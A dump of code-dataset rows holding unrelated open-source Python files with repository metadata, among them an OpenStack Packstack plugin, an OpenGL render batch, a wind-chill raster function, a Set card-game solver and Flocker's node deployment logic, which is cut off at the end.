| false
| 4.253262
| false
| false
| false
|
MariusCC/packstack
|
packstack/plugins/openstack_client_400.py
|
1
|
2747
|
"""
Installs and configures an OpenStack Client
"""
import logging
from packstack.installer import validators
from packstack.installer import basedefs, output_messages
from packstack.installer import utils
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-CLIENT"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Client configuration")
paramsList = [
{"CMD_OPTION" : "osclient-host",
"USAGE" : "The IP address of the server on which to install the OpenStack client packages. An admin \"rc\" file will also be installed",
"PROMPT" : "Enter the IP address of the client server",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_OSCLIENT_HOST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "NOVACLIENT",
"DESCRIPTION" : "NOVACLIENT Config parameters",
"PRE_CONDITION" : "CONFIG_CLIENT_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
def initSequences(controller):
if controller.CONF['CONFIG_CLIENT_INSTALL'] != 'y':
return
osclientsteps = [
{'title': 'Adding OpenStack Client manifest entries', 'functions':[createmanifest]}
]
controller.addSequence("Installing OpenStack Client", [], [], osclientsteps)
def createmanifest():
client_host = controller.CONF['CONFIG_OSCLIENT_HOST'].strip()
manifestfile = "%s_osclient.pp" % client_host
manifestdata = getManifestTemplate("openstack_client.pp")
appendManifestFile(manifestfile, manifestdata)
server = utils.ScriptRunner(client_host)
server.append('echo $HOME')
rc, root_home = server.execute()
msg = ("To use the command line tools you need to source the file "
"%s/keystonerc_admin created on %s")
controller.MESSAGES.append(msg % (root_home.strip(), client_host))
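# For illustration (host address made up): with CONFIG_OSCLIENT_HOST set
# to 192.168.0.10, the generated manifest is named
# "192.168.0.10_osclient.pp" and the final message points at
# /root/keystonerc_admin on that host.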
|
apache-2.0
| -7,500,177,406,174,176,000
| 37.152778
| 165
| 0.603568
| false
| 4.226154
| true
| false
| false
|
renatopp/psi-robotics
|
psi/engine/render_batch.py
|
1
|
4484
|
# =============================================================================
# Federal University of Rio Grande do Sul (UFRGS)
# Connectionist Artificial Intelligence Laboratory (LIAC)
# Renato de Pontes Pereira - renato.ppontes@gmail.com
# =============================================================================
# Copyright (c) 2011 Renato de Pontes Pereira, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# =============================================================================
import psi
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
from OpenGL.arrays.vbo import VBO
__all__ = ['RenderBatch', 'RenderBatchOpt']
class RenderBatch(object):
def __init__(self, draw_type=GL_QUADS):
self.count = 0
self.color_data = []
self.position_data = []
self.color_buffer = VBO(np.array([]))
self.position_buffer = VBO(np.array([]))
self.draw_type = draw_type
def draw2d(self, points, color=(0, 0, 0, 1), rotation=0, center=(0, 0)):
n = len(points)
self.count += n
if not isinstance(color[0], (tuple, list)):
color = [color]*n
if rotation:
transform = psi.calc.rotation_matrix(rotation)
temp = np.array(points) - center
temp = transform.dot(temp.T).T + center
points = temp.tolist()
self.color_data.extend(color)
self.position_data.extend(points)
def clear(self):
self.position_data = []
self.color_data = []
self.count = 0
def render(self):
self.color_buffer.set_array(np.array(self.color_data, dtype='float32'))
self.position_buffer.set_array(np.array(self.position_data, dtype='float32'))
self.color_buffer.bind()
glColorPointer(4, GL_FLOAT, 0, self.color_buffer)
self.position_buffer.bind()
glVertexPointer(2, GL_FLOAT, 0, self.position_buffer)
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glDrawArrays(self.draw_type, 0, self.count)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_VERTEX_ARRAY)
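# A hypothetical frame using the batch above: accumulate geometry, draw
# it once, then clear for the next frame.
#
#   batch = RenderBatch()
#   batch.draw2d([(0, 0), (1, 0), (1, 1), (0, 1)], color=(1, 0, 0, 1))
#   batch.render()
#   batch.clear()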
class RenderBatchOpt(object):
def __init__(self, draw_type=GL_QUADS):
self.count = 0
self.color_buffer = VBO(np.array([]))
self.vertex_buffer = VBO(np.array([]))
self.draw_type = draw_type
def draw2d(self, points, color=(0, 0, 0, 1), rotation=0, center=(0, 0)):
n = points.shape[0]
self.count += n
if rotation:
transform = psi.calc.rotation_matrix(rotation)
temp = points - center
temp = transform.dot(temp.T).T + center
points = temp.tolist()
self.color_buffer.set_array(color)
self.vertex_buffer.set_array(points)
def clear(self):
self.color_buffer.set_array(np.array([]))
self.vertex_buffer.set_array(np.array([]))
self.count = 0
def render(self):
self.color_buffer.bind()
glColorPointer(4, GL_FLOAT, 0, self.color_buffer)
self.vertex_buffer.bind()
glVertexPointer(2, GL_FLOAT, 0, self.vertex_buffer)
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glDrawArrays(self.draw_type, 0, self.count)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_VERTEX_ARRAY)
|
mit
| -5,479,215,739,809,386,000
| 34.595238
| 85
| 0.622212
| false
| 3.835757
| false
| false
| false
|
hfeeki/transifex
|
transifex/txcommon/listeners.py
|
1
|
1502
|
from django.conf import settings
from django.contrib.auth.models import Group, SiteProfileNotAvailable
from django.core.exceptions import ImproperlyConfigured
from django.db import models, transaction
from transifex.txcommon.log import logger
if not settings.AUTH_PROFILE_MODULE:
raise SiteProfileNotAvailable
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
Profile = models.get_model(app_label, model_name)
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
if not Profile:
raise SiteProfileNotAvailable
@transaction.commit_manually
def add_user_to_registered_group(sender, **kwargs):
"""
Add any user created on the system to the `registered` group.
This signal must be called by the post_save signal from the User class.
This signal also creates a public profile for the user if it does not exist.
"""
if 'created' in kwargs and kwargs['created'] is True:
user = kwargs['instance']
# Add user to registered group
group, created = Group.objects.get_or_create(name='registered')
user.groups.add(group)
sid = transaction.savepoint()
# Create Public Profile
try:
profile, created = Profile.objects.get_or_create(user=user)
profile.save()
transaction.savepoint_commit(sid)
except:
logger.debug("User profile not created.")
transaction.savepoint_rollback(sid)
transaction.commit()
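# A hypothetical wiring of this handler (the actual connect() call lives
# elsewhere in the project):
#
#   from django.contrib.auth.models import User
#   from django.db.models.signals import post_save
#   post_save.connect(add_user_to_registered_group, sender=User)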
|
gpl-2.0
| 5,225,806,281,291,356,000
| 33.136364
| 80
| 0.703728
| false
| 4.34104
| false
| false
| false
|
Esri/solutions-raster-functions
|
scripts/WindChillNonUV.py
|
1
|
6467
|
# ----------------------------------------------------------------------------------
# Copyright 2015 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
# Name: Windchill_non_uv
# Description: Raster function that calculates wind chill using a single variable for windspeed.
# Date Edited: 24/03/2015
#-----------------------------------------------------------------------------------
import numpy as np
class Windchill_non_uv():
def __init__(self):
self.name = "Wind Chill Function"
self.description = "This function computes wind chill on the Fahrenheit scale given wind speed and air temperature."
self.tempunits = "celsius"
self.windunits = "mps"
def getParameterInfo(self):
return [
{
            'name': 'temperature', # Needs to be edited by user to match name of variable in their dataset
'dataType': 'raster',
'value': None,
'required': True,
'displayName': "Temperature Raster",
'description': "A single-band raster where pixel values represent ambient air temperature in Fahrenheit."
},
{
'name': 'units',
'dataType': 'string',
'value': 'Kelvin', # Needs to be edited by the user to match what their units are for the temperature variable.
'required': True,
'domain': ('Celsius', 'Fahrenheit', 'Kelvin'),
'displayName': "Temperature Measured In",
'description': "The unit of measurement associated with the temperature raster."
},
{
'name': 'units2',
'dataType': 'string',
'value': 'mps', # Needs to be edited by the user to match what their units are for the wind speed variable.
'required': True,
'domain': ('mps', 'mph', 'kmph', 'knots'),
'displayName': "Temperature Measured In",
'description': "The unit of measurement associated with the temperature raster."
},
{
            'name': 'ws', # Needs to be edited by user to match name of variable in their dataset
'dataType': 'raster',
'value': None,
'required': True,
'displayName': "Wind-speed Raster",
'description': "A single-band raster where pixel values represent wind speed measured in miles per hour."
},
]
def getConfiguration(self, **scalars):
return {
'inheritProperties': 4 | 8, # inherit all but the pixel type and NoData from the input raster
'invalidateProperties': 2 | 4 | 8, # invalidate statistics & histogram on the parent dataset because we modify pixel values.
'inputMask': False # Don't need input raster mask in .updatePixels(). Simply use the inherited NoData.
}
def updateRasterInfo(self, **kwargs):
kwargs['output_info']['bandCount'] = 1 # output is a single band raster
        kwargs['output_info']['statistics'] = ({'minimum': -90, 'maximum': 40}, )  # approximate range of wind chill values in Fahrenheit
kwargs['output_info']['histogram'] = () # we know nothing about the histogram of the outgoing raster.
kwargs['output_info']['pixelType'] = 'f4'
# Getting and then setting the Temprature Units for use later
if kwargs.get('units').lower() == 'celsius':
self.tempunits = 'celsius'
        elif kwargs.get('units').lower() == 'fahrenheit':
            self.tempunits = 'fahrenheit'
elif kwargs.get('units').lower() == 'kelvin':
self.tempunits = 'kelvin'
# Getting and then setting the Windspeed Units for use later
if kwargs.get('units2').lower() == 'mps':
self.windunits = 'mps'
elif kwargs.get('units2').lower() == 'mph':
self.windunits = 'mph'
elif kwargs.get('units2').lower() == 'kmph':
self.windunits = 'kmph'
elif kwargs.get('units2').lower() == 'knots':
self.windunits = 'knots'
#self.doConversion = bool(kwargs.get('units', 'Fahrenheit').lower() == 'Celsius')
return kwargs
def updatePixels(self, tlc, size, props, **pixelBlocks):
ws = np.array(pixelBlocks['ws_pixels'], dtype='f4')
t = np.array(pixelBlocks['temperature_pixels'], dtype='f4')
# Using the temperature variable generated earlier to know if a calculation is needed to turn the temp into degrees F
if self.tempunits.lower() == "celsius":
t = (9.0/5.0 * t) + 32.0
elif self.tempunits.lower() == "kelvin":
            t = (t - 273.15) * 1.8 + 32.0
else:
t = t
# Using the windspeed variable generated earlier to know if a calculation is needed to turn the windspeed into mph
if self.windunits.lower() == "mps":
ws = ws * 2.2369362920544
elif self.windunits.lower() == "kmph":
ws = ws * 0.621371
        elif self.windunits.lower() == "knots":
ws = ws * 1.15078
else:
ws = ws
ws16 = np.power(ws, 0.16)
outBlock = 35.74 + (0.6215 * t) - (35.75 * ws16) + (0.4275 * t * ws16)
pixelBlocks['output_pixels'] = outBlock.astype(props['pixelType'])
return pixelBlocks
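    # Worked example against the NWS wind chill chart: t = 5 F and
    # ws = 20 mph give ws16 = 20**0.16 ~= 1.615, so the output is
    # 35.74 + 0.6215*5 - 35.75*1.615 + 0.4275*5*1.615 ~= -15 F.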
def updateKeyMetadata(self, names, bandIndex, **keyMetadata):
if bandIndex == -1:
            keyMetadata['datatype'] = 'Scientific'
            keyMetadata['variable'] = 'Windchill'
elif bandIndex == 0:
keyMetadata['wavelengthmin'] = None # reset inapplicable band-specific key metadata
keyMetadata['wavelengthmax'] = None
keyMetadata['bandname'] = 'Windchill'
return keyMetadata
|
apache-2.0
| -6,303,209,935,558,709,000
| 43.6
| 141
| 0.562394
| false
| 4.158842
| false
| false
| false
|
osroom/osroom
|
apps/core/flask/reqparse.py
|
1
|
4656
|
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2017/11/1 ~ 2019/9/1
# @Author : Allen Woo
from flask_babel import gettext
import regex as re
class ArgVerify:
def required(self, **kwargs):
for reqarg in kwargs.get("reqargs"):
if not reqarg[1]:
data = {'msg': gettext('The "{}" cannot be empty').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def min_len(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if len(reqarg[1]) < vr:
data = {'msg': gettext('The minimum length of "{}" is {} characters').format(
reqarg[0], vr), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def max_len(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if len(reqarg[1]) > vr:
data = {'msg': gettext('The maximum length of "{}" is {} characters').format(
reqarg[0], vr), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def need_type(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if not isinstance(reqarg[1], vr):
data = {'msg': gettext('"{}" needs to be of type {}').format(
reqarg[0], vr.__name__), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def only(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if not reqarg[1] in kwargs.get("vr"):
data = {
'msg': gettext('The value of parameter "{}" can only be one of "{}"').format(
reqarg[0],
",".join(vr)),
'msg_type': "w",
"custom_status": 422}
return False, data
return True, None
def can_not(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if reqarg[1] in vr:
data = {'msg': gettext('The value of parameter "{}" can not be "{}"').format(
reqarg[0], ",".join(vr)), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def allowed_type(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if type(reqarg[1]) not in vr:
data = {
'msg': gettext('Parameter {} can only be of the following type: "{}"').format(
reqarg[0],
",".join(vr)),
'msg_type': 'error',
"custom_status": 422}
return False, data
return True, None
def regex_rule(self, **kwargs):
vr = kwargs.get("vr")
if vr["is_match"]:
for reqarg in kwargs.get("reqargs"):
if not re.search(vr["rule"], reqarg[1]):
return False, {
'msg': gettext('The value of parameter "{}" is illegal').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
else:
for reqarg in kwargs.get("reqargs"):
if re.search(vr["rule"], reqarg[1]):
return False, {
'msg': gettext('The value of parameter "{}" is illegal').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
return True, None
arg_ver = ArgVerify()
def arg_verify(reqargs=[], **kwargs):
"""
:param reqargs:数组,如:[(arg_key, arg_value)]
:param required:bool, 为True表示不能为空
:param min_len: int, 最小长度
:param max_len: int, 最大长度
:param need_type: 类型如int, dict, list .tuple
:param only: 数组, 只能是only数组中的元素
:param can_not: 数组, 不能是can_not中的元素
:param allowed_type: 数组, 允许数据的类型是allowed_type中的元素
:param regex_rule: Such as::{"rule":r".*", "is_match":True}
is_match :True 表示需要匹配成功, False 表示需要不匹配该规则的
:param args:
:param kwargs:
:return:验证状态,验证信息
"""
for k, v in kwargs.items():
s, r = getattr(arg_ver, k)(reqargs=reqargs, vr=v)
if not s:
return s, r
return True, None
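# A hypothetical call (argument names invented for illustration):
#
#   status, result = arg_verify(reqargs=[("username", username)],
#                               required=True, min_len=3, max_len=32)
#   if not status:
#       return result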
|
bsd-2-clause
| 7,536,587,753,218,895,000
| 34.322835
| 98
| 0.488185
| false
| 3.532283
| false
| false
| false
|
bruckhaus/challenges
|
python_challenges/set_game.py
|
1
|
3414
|
import pprint as pp
import random
class SetGame:
interactive_mode = False
NUM_CARDS_IN_DECK = 81
NUM_CARDS_IN_HAND = 12
NUM_ATTRIBUTES = 4
COUNTS = [1, 2, 3]
FILLS = ['empty', 'striped', 'full']
COLORS = ['red', 'green', 'blue']
SHAPES = ['diamond', 'squiggly', 'oval']
deck = []
hand = []
triplet = None
def __init__(self):
self.triplet = [0, 0, 0]
def play(self):
self.make_deck()
self.deal_hand()
self.check_hand()
def make_deck(self):
self.deck = []
for count in self.COUNTS:
for fill in self.FILLS:
for color in self.COLORS:
for shape in self.SHAPES:
card = [count, fill, color, shape]
self.deck.append(card)
if self.interactive_mode:
print "\nDeck:"
pp.pprint(self.deck)
return self.deck
def deal_hand(self):
for i in range(self.NUM_CARDS_IN_HAND):
r = random.randint(0, self.NUM_CARDS_IN_DECK - 1 - i)
card = self.deck[r]
self.hand.append(card)
self.deck.remove(card)
if self.interactive_mode:
print "\nHand:"
pp.pprint(self.hand)
return self.hand
def check_hand(self):
matches = []
if self.interactive_mode:
print "\nMatches:"
self.next_valid_triplet()
while self.triplet:
if self.check_match():
matches.append(self.triplet[:])
if self.interactive_mode:
self.show_triplet()
self.next_valid_triplet()
return matches
def check_match(self):
for p in range(self.NUM_ATTRIBUTES):
if not (self.all_same(p) or self.all_different(p)):
return False
return True
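    # Example: [1, 'full', 'red', 'oval'], [2, 'full', 'green', 'oval']
    # and [3, 'full', 'blue', 'oval'] form a set: the counts all differ,
    # the fills all match, the colors all differ and the shapes all match.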
def all_same(self, p):
t = self.triplet
t1 = self.hand[t[0]]
t2 = self.hand[t[1]]
t3 = self.hand[t[2]]
return t1[p] == t2[p] and t2[p] == t3[p]
def all_different(self, p):
t = self.triplet
t1 = self.hand[t[0]]
t2 = self.hand[t[1]]
t3 = self.hand[t[2]]
return t1[p] != t2[p] and t2[p] != t3[p] and t1[p] != t3[p]
def show_triplet(self):
print " ", self.triplet
print " ", self.hand[self.triplet[0]]
print " ", self.hand[self.triplet[1]]
print " ", self.hand[self.triplet[2]]
def next_valid_triplet(self):
while True:
self.next_triplet()
if (not self.triplet) or self.is_triplet_valid():
break
def next_triplet(self):
for p in reversed(range(3)):
if self.triplet[p] < self.NUM_CARDS_IN_HAND - 1:
self.triplet[p] += 1
return
else:
self.triplet[p] = 0
self.triplet = None
def is_triplet_valid(self):
t = self.triplet
# can't choose same card twice:
if t[0] == t[1] or t[1] == t[2]:
return False
# order of cards is not significant: allow only smallest sort order of each combination and reject others:
if t[0] > t[1] or t[1] > t[2]:
return False
return True
if __name__ == '__main__':
game = SetGame()
game.interactive_mode = True
game.play()
|
mit
| 5,268,973,161,389,575,000
| 27.940678
| 114
| 0.503222
| false
| 3.451972
| false
| false
| false
|
odoousers2014/odoo_addons-2
|
clv_place/__openerp__.py
|
1
|
2321
|
# -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
{
'name': 'Place',
'version': '1.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'category': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://clvsol.com',
'description': '''
Place
=====
''',
'depends': [
'clv_base',
'clv_tag',
'clv_annotation',
],
'data': [
'security/clv_place_security.xml',
'security/ir.model.access.csv',
'clv_place_view.xml',
'category/clv_place_category_view.xml',
'clv_tag/clv_tag_view.xml',
'clv_annotation/clv_annotation_view.xml',
'seq/clv_place_seq_view.xml',
'seq/clv_place_sequence.xml',
'seq/clv_place_category_sequence.xml',
'wkf/clv_place_workflow.xml',
'wkf/clv_place_wkf_view.xml',
'history/clv_place_history_view.xml',
],
'test': [],
'installable': True,
'active': False,
}
|
agpl-3.0
| -8,132,136,832,875,332,000
| 42.792453
| 80
| 0.453253
| false
| 4.346442
| false
| false
| false
|
beni55/flocker
|
flocker/node/_deploy.py
|
1
|
18591
|
# Copyright Hybrid Logic Ltd. See LICENSE file for details.
# -*- test-case-name: flocker.node.test.test_deploy -*-
"""
Deploy applications on nodes.
"""
from zope.interface import Interface, implementer
from characteristic import attributes
from twisted.internet.defer import gatherResults, fail, DeferredList, succeed
from twisted.python.filepath import FilePath
from .gear import GearClient, PortMap, GearEnvironment
from ._model import (
Application, VolumeChanges, AttachedVolume, VolumeHandoff,
)
from ..route import make_host_network, Proxy
from ..volume._ipc import RemoteVolumeManager
from ..common._ipc import ProcessNode
# Path to SSH private key available on nodes and used to communicate
# across nodes.
# XXX duplicate of same information in flocker.cli:
# https://github.com/ClusterHQ/flocker/issues/390
SSH_PRIVATE_KEY_PATH = FilePath(b"/etc/flocker/id_rsa_flocker")
@attributes(["running", "not_running"])
class NodeState(object):
"""
The current state of a node.
:ivar running: A ``list`` of ``Application`` instances on this node
that are currently running or starting up.
:ivar not_running: A ``list`` of ``Application`` instances on this
node that are currently shutting down or stopped.
"""
class IStateChange(Interface):
"""
An operation that changes the state of the local node.
"""
def run(deployer):
"""
Run the change.
:param Deployer deployer: The ``Deployer`` to use.
:return: ``Deferred`` firing when the change is done.
"""
def __eq__(other):
"""
Return whether this change is equivalent to another.
"""
def __ne__(other):
"""
Return whether this change is not equivalent to another.
"""
@implementer(IStateChange)
@attributes(["changes"])
class Sequentially(object):
"""
Run a series of changes in sequence, one after the other.
Failures in earlier changes stop later changes.
"""
def run(self, deployer):
d = succeed(None)
for change in self.changes:
d.addCallback(lambda _, change=change: change.run(deployer))
return d
@implementer(IStateChange)
@attributes(["changes"])
class InParallel(object):
"""
Run a series of changes in parallel.
Failures in one change do not prevent other changes from continuing.
"""
def run(self, deployer):
return gatherResults((change.run(deployer) for change in self.changes),
consumeErrors=True)
@implementer(IStateChange)
@attributes(["application"])
class StartApplication(object):
"""
Launch the supplied application as a gear unit.
:ivar Application application: The ``Application`` to create and
start.
"""
def run(self, deployer):
application = self.application
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
d = volume.expose_to_docker(application.volume.mountpoint)
else:
d = succeed(None)
if application.ports is not None:
port_maps = map(lambda p: PortMap(internal_port=p.internal_port,
external_port=p.external_port),
application.ports)
else:
port_maps = []
if application.environment is not None:
environment = GearEnvironment(
id=application.name,
variables=application.environment)
else:
environment = None
d.addCallback(lambda _: deployer.gear_client.add(
application.name,
application.image.full_name,
ports=port_maps,
environment=environment
))
return d
@implementer(IStateChange)
@attributes(["application"])
class StopApplication(object):
"""
Stop and disable the given application.
:ivar Application application: The ``Application`` to stop.
"""
def run(self, deployer):
application = self.application
unit_name = application.name
result = deployer.gear_client.remove(unit_name)
def unit_removed(_):
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
return volume.remove_from_docker()
result.addCallback(unit_removed)
return result
@implementer(IStateChange)
@attributes(["volume"])
class CreateVolume(object):
"""
Create a new locally-owned volume.
:ivar AttachedVolume volume: Volume to create.
"""
def run(self, deployer):
return deployer.volume_service.create(self.volume.name)
@implementer(IStateChange)
@attributes(["volume"])
class WaitForVolume(object):
"""
Wait for a volume to exist and be owned locally.
:ivar AttachedVolume volume: Volume to wait for.
"""
def run(self, deployer):
return deployer.volume_service.wait_for_volume(self.volume.name)
@implementer(IStateChange)
@attributes(["volume", "hostname"])
class HandoffVolume(object):
"""
A volume handoff that needs to be performed from this node to another
node.
    See :py:meth:`flocker.volume.VolumeService.handoff` for more details.
:ivar AttachedVolume volume: The volume to hand off.
:ivar bytes hostname: The hostname of the node to which the volume is
meant to be handed off.
"""
def run(self, deployer):
service = deployer.volume_service
destination = ProcessNode.using_ssh(
self.hostname, 22, b"root",
SSH_PRIVATE_KEY_PATH)
return service.handoff(service.get(self.volume.name),
RemoteVolumeManager(destination))
@implementer(IStateChange)
@attributes(["ports"])
class SetProxies(object):
"""
Set the ports which will be forwarded to other nodes.
:ivar ports: A collection of ``Port`` objects.
"""
def run(self, deployer):
results = []
# XXX: Errors in these operations should be logged. See
# https://github.com/ClusterHQ/flocker/issues/296
# XXX: The proxy manipulation operations are blocking. Convert to a
# non-blocking API. See https://github.com/ClusterHQ/flocker/issues/320
for proxy in deployer.network.enumerate_proxies():
try:
deployer.network.delete_proxy(proxy)
except:
results.append(fail())
for proxy in self.ports:
try:
deployer.network.create_proxy_to(proxy.ip, proxy.port)
except:
results.append(fail())
return DeferredList(results, fireOnOneErrback=True, consumeErrors=True)
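# Illustrative composition of the primitives above (the applications are
# hypothetical): stop the old container, then start the new one, with
# each phase free to run several changes in parallel.
#
#   change = Sequentially(changes=[
#       InParallel(changes=[StopApplication(application=old_app)]),
#       InParallel(changes=[StartApplication(application=new_app)]),
#   ])
#   d = change.run(deployer)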
class Deployer(object):
"""
Start and stop applications.
:ivar VolumeService volume_service: The volume manager for this node.
:ivar IGearClient gear_client: The gear client API to use in
deployment operations. Default ``GearClient``.
:ivar INetwork network: The network routing API to use in
deployment operations. Default is iptables-based implementation.
"""
def __init__(self, volume_service, gear_client=None, network=None):
if gear_client is None:
gear_client = GearClient(hostname=u'127.0.0.1')
self.gear_client = gear_client
if network is None:
network = make_host_network()
self.network = network
self.volume_service = volume_service
def discover_node_configuration(self):
"""
List all the ``Application``\ s running on this node.
:returns: A ``Deferred`` which fires with a ``NodeState``
instance.
"""
volumes = self.volume_service.enumerate()
volumes.addCallback(lambda volumes: set(
volume.name for volume in volumes
if volume.uuid == self.volume_service.uuid))
d = gatherResults([self.gear_client.list(), volumes])
def applications_from_units(result):
units, available_volumes = result
running = []
not_running = []
for unit in units:
# XXX: The container_image will be available on the
# Unit when
# https://github.com/ClusterHQ/flocker/issues/207 is
# resolved.
if unit.name in available_volumes:
# XXX Mountpoint is not available, see
# https://github.com/ClusterHQ/flocker/issues/289
volume = AttachedVolume(name=unit.name, mountpoint=None)
else:
volume = None
application = Application(name=unit.name,
volume=volume)
if unit.activation_state in (u"active", u"activating"):
running.append(application)
else:
not_running.append(application)
return NodeState(running=running, not_running=not_running)
d.addCallback(applications_from_units)
return d
def calculate_necessary_state_changes(self, desired_state,
current_cluster_state, hostname):
"""
Work out which changes need to happen to the local state to match
the given desired state.
Currently this involves the following phases:
1. Change proxies to point to new addresses (should really be
last, see https://github.com/ClusterHQ/flocker/issues/380)
2. Stop all relevant containers.
3. Handoff volumes.
4. Wait for volumes.
5. Create volumes.
6. Start and restart any relevant containers.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes. While technically this also includes the current
node's state, this information may be out of date so we check
again to ensure we have absolute latest information.
:param unicode hostname: The hostname of the node that this is running
on.
:return: A ``Deferred`` which fires with a ``IStateChange``
provider.
"""
phases = []
desired_proxies = set()
desired_node_applications = []
for node in desired_state.nodes:
if node.hostname == hostname:
desired_node_applications = node.applications
else:
for application in node.applications:
for port in application.ports:
# XXX: also need to do DNS resolution. See
# https://github.com/ClusterHQ/flocker/issues/322
desired_proxies.add(Proxy(ip=node.hostname,
port=port.external_port))
if desired_proxies != set(self.network.enumerate_proxies()):
phases.append(SetProxies(ports=desired_proxies))
d = self.discover_node_configuration()
def find_differences(current_node_state):
current_node_applications = current_node_state.running
all_applications = (current_node_state.running +
current_node_state.not_running)
# Compare the applications being changed by name only. Other
# configuration changes aren't important at this point.
current_state = {app.name for app in current_node_applications}
desired_local_state = {app.name for app in
desired_node_applications}
not_running = {app.name for app in current_node_state.not_running}
# Don't start applications that exist on this node but aren't
# running; instead they should be restarted:
start_names = desired_local_state.difference(
current_state | not_running)
stop_names = {app.name for app in all_applications}.difference(
desired_local_state)
start_containers = [
StartApplication(application=app)
for app in desired_node_applications
if app.name in start_names
]
stop_containers = [
StopApplication(application=app) for app in all_applications
if app.name in stop_names
]
restart_containers = [
Sequentially(changes=[StopApplication(application=app),
StartApplication(application=app)])
for app in desired_node_applications
if app.name in not_running
]
# Find any applications with volumes that are moving to or from
# this node - or that are being newly created by this new
# configuration.
volumes = find_volume_changes(hostname, current_cluster_state,
desired_state)
if stop_containers:
phases.append(InParallel(changes=stop_containers))
if volumes.going:
phases.append(InParallel(changes=[
HandoffVolume(volume=handoff.volume,
hostname=handoff.hostname)
for handoff in volumes.going]))
if volumes.coming:
phases.append(InParallel(changes=[
WaitForVolume(volume=volume)
for volume in volumes.coming]))
if volumes.creating:
phases.append(InParallel(changes=[
CreateVolume(volume=volume)
for volume in volumes.creating]))
start_restart = start_containers + restart_containers
if start_restart:
phases.append(InParallel(changes=start_restart))
d.addCallback(find_differences)
d.addCallback(lambda _: Sequentially(changes=phases))
return d
def change_node_state(self, desired_state,
current_cluster_state,
hostname):
"""
Change the local state to match the given desired state.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes.
:param unicode hostname: The hostname of the node that this is running
on.
:return: ``Deferred`` that fires when the necessary changes are done.
"""
d = self.calculate_necessary_state_changes(
desired_state=desired_state,
current_cluster_state=current_cluster_state,
hostname=hostname)
